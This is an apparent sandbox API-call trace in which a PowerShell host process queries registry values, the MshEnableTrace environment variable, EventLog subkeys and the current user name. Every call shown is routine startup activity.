	[0055.218] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22e320, lpData=0x0, lpcbData=0x22e31c*=0x0 | out: lpType=0x22e320*=0x1, lpData=0x0, lpcbData=0x22e31c*=0x8) returned 0x0
	[0055.218] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22e320, lpData=0x3c3520, lpcbData=0x22e31c*=0x8 | out: lpType=0x22e320*=0x1, lpData="2.0", lpcbData=0x22e31c*=0x8) returned 0x0
	[0055.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.220] GetLastError () returned 0xcb
	[0055.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.223] GetLastError () returned 0xcb
	[0055.228] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e288 | out: phkResult=0x22e288*=0x300) returned 0x0
	[0055.228] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e2f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e2f0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2ec*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.229] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.230] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.230] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.230] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x3c3520, lpcchName=0x22e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.230] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x304) returned 0x0
	[0055.230] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.230] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x320) returned 0x0
	[0055.231] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.231] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x330) returned 0x0
	[0055.231] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.231] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x334) returned 0x0
	[0055.231] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.231] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x338) returned 0x0
	[0055.231] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.232] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x33c) returned 0x0
	[0055.232] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.232] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x5
	[0055.313] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x340) returned 0x0
	[0055.313] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x0) returned 0x2
	[0055.313] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x344) returned 0x0
	[0055.313] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2b8 | out: phkResult=0x22e2b8*=0x348) returned 0x0
	[0055.313] RegCloseKey (hKey=0x348) returned 0x0
	[0055.314] RegCloseKey (hKey=0x300) returned 0x0
	[0055.314] RegCloseKey (hKey=0x344) returned 0x0
	[0055.326] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.374] GetLastError () returned 0x3
	[0055.375] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e26c | out: phkResult=0x22e26c*=0x34c) returned 0x0
	[0055.718] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e2d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e2d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.718] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.718] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.718] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.719] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.720] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x350) returned 0x0
	[0055.720] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.720] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x354) returned 0x0
	[0055.720] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.720] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x358) returned 0x0
	[0055.720] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.721] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x35c) returned 0x0
	[0055.721] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.721] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x360) returned 0x0
	[0055.721] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.721] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x364) returned 0x0
	[0055.721] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.721] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x5
	[0055.724] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x368) returned 0x0
	[0055.725] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.725] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x36c) returned 0x0
	[0055.725] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x370) returned 0x0
	[0055.725] RegCloseKey (hKey=0x370) returned 0x0
	[0055.725] RegCloseKey (hKey=0x34c) returned 0x0
	[0055.725] RegCloseKey (hKey=0x36c) returned 0x0
	[0055.725] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e26c | out: phkResult=0x22e26c*=0x36c) returned 0x0
	[0055.725] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e2d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e2d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.725] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.726] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3c3520, lpcchName=0x22e2f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22e2f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x34c) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.727] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x370) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.727] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x374) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.727] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x378) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.727] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x37c) returned 0x0
	[0055.727] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.728] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x380) returned 0x0
	[0055.728] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.728] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x5
	[0055.729] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x384) returned 0x0
	[0055.730] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x0) returned 0x2
	[0055.730] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x388) returned 0x0
	[0055.730] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e29c | out: phkResult=0x22e29c*=0x38c) returned 0x0
	[0055.730] RegCloseKey (hKey=0x38c) returned 0x0
	[0055.730] RegCloseKey (hKey=0x36c) returned 0x0
	[0055.730] RegCloseKey (hKey=0x388) returned 0x0
	[0055.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e260 | out: phkResult=0x22e260*=0x388) returned 0x0
	[0055.730] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e2c8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2c4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e2c8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e2c4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.731] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.732] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x3c3520, lpcchName=0x22e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.732] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x36c) returned 0x0
	[0055.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.732] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x38c) returned 0x0
	[0055.732] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.732] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x390) returned 0x0
	[0055.732] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
